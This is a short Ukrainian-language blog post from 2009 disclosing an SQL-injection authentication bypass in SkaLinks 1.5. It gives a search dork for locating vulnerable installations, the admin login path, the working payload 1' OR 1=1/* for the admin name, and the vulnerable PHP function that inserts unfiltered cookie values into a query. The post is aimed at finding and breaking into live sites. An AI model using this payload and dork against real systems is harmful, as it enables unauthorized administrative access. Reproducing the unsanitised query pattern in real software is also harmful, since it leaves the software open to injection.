Archive

Posts Tagged ‘Auth Bypass’

Обхід Авторизації (Auth Bypass) SkaLinks

April 13th, 2009 Dimi4 No comments

Продукт : SkaLinks
Версія : 1.5
Dork : “Powered by SkaLinks “
Офіційний сат: http://www.skalinks.com/
Вразливість знайдена: Dimi4
Тип: SQL-injection, Auth Bypass

Вразливість існує через недостатню фільтрацію вхідних даних у функціїї авторизацїї
[+] URL: http://target.com/skalinks_1_5/admin/
[+] Admin name : 1′ OR 1=1/*

Вразлива функція:

  1.  
  2. function IsAdmin( )
  3. {
  4. $table_name = $this->m_AdminsTable;
  5. $res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`=’".$_COOKIE['adminname']."’ AND `Password`=’".$_COOKIE['pwd']."’");
  6. if ( !$res )
  7. {
  8. return 0;
  9. }
  10. else
  11. {
  12. return $res;
  13. }
  14. }
  15.  

(c) Dimi4, 2009 greetz to UASC, antichat

Categories: Безпека Tags: ,